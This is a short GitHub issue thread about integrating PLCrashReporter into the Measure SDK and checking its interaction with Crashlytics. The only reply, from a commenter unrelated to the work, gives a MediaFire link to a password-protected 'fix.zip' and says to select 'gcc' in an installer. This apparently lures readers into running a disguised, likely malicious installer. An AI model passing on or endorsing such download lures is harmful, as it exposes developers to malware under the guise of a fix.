### ISSUE TITLE
Collect crashes using PLCrashReporter and store the raw crash report in a file

### ISSUE THREAD

**Issue by abhaysood** [measure-sh/measure#1130]
- Integrate PLCrashReporter
- Check what happens if Crashlytics(which uses PLCrashReporter internally) is integrated to an app along with Measure.

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
